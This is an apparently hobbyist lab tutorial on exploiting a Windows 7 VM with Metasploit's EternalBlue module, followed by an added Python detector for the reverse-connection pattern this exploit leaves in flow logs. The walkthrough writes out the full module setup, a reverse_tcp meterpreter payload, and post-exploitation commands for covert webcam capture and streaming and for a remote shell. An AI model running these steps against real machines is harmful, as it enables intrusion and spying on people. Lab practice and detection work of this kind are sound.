Getting Started with MSF: A Practice Run

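My roommate has been digging into Metasploit for the past few days and pulled me in as well, so I set up a virtual machine to play around with EternalBlue.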

Environment:

  • kali (attacker) ip: 192.168.137.202
  • windows7 (target) ip: 192.168.137.11

1. Start Metasploit

service postgresql start
msfconsole

2. Next, search for usable modules

search eternalblue

msf > search eternalblue

Matching Modules
================

Name                                           Disclosure Date  Rank     Description
----                                           ---------------  ----     -----------
auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
auxiliary/scanner/smb/smb_ms17_010                              normal   MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

Here we pick the third entry in the list:

use exploit/windows/smb/ms17_010_eternalblue

The options command then shows the module's parameters. Next, set the target IP, the local IP and the payload:

set rhost 192.168.137.11
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.137.202

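3. Launch the attack

Seeing the word WIN in the output means the attack succeeded.

We can now see the target system under our control:

# Take a snapshot with the target's webcam and have it sent back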
meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/AnlffeOA.jpeg

# Have the target start streaming webcam video
meterpreter > webcam_stream
[*] Starting...
[*] Preparing player...
[*] Opening player at: PMxWScNA.html
[*] Streaming...

# Drop into a shell on the target
meterpreter > shell
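
The reverse_tcp payload set in step 2 makes the exploited host connect back to lhost, so in flow logs an inbound SMB session is followed within seconds by an outbound connection to the same peer. The following is an added example (not part of the original post) that flags that sequence from the defender's side; the log format, timestamps and listener port 4444 are constructed assumptions.

```python
import csv
from datetime import datetime, timedelta
from io import StringIO

# Constructed flow records: time, initiator, responder, responder port.
# Addresses are the lab hosts from this post; port 4444 is an assumed listener port.
SAMPLE_FLOWS = """\
2024-01-01T10:00:00,192.168.137.50,192.168.137.11,445
2024-01-01T10:00:05,192.168.137.11,192.168.137.1,53
2024-01-01T10:05:00,192.168.137.202,192.168.137.11,445
2024-01-01T10:05:09,192.168.137.11,192.168.137.202,4444
2024-01-01T11:30:00,192.168.137.11,192.168.137.50,3389
"""

def parse_flows(text):
    """Parse CSV flow lines into (datetime, src, dst, dport) tuples sorted by time."""
    rows = []
    for ts, src, dst, dport in csv.reader(StringIO(text)):
        rows.append((datetime.fromisoformat(ts), src, dst, int(dport)))
    return sorted(rows)

def find_smb_callbacks(flows, window_s=60):
    """Flag hosts that receive SMB (445) from a peer and then open a new
    connection back to that same peer within window_s seconds."""
    window = timedelta(seconds=window_s)
    last_smb = {}  # (server, client) -> time of the most recent inbound 445 flow
    alerts = []
    for ts, src, dst, dport in flows:
        if dport == 445:
            last_smb[(dst, src)] = ts
            continue
        seen = last_smb.get((src, dst))
        if seen is not None and ts - seen <= window:
            alerts.append({"host": src, "peer": dst, "port": dport,
                           "delay_s": int((ts - seen).total_seconds())})
    return alerts

if __name__ == "__main__":
    for alert in find_smb_callbacks(parse_flows(SAMPLE_FLOWS)):
        print(alert)
```

The ordinary file-share client (192.168.137.50) is not flagged, because the server's later connection to it falls outside the time window.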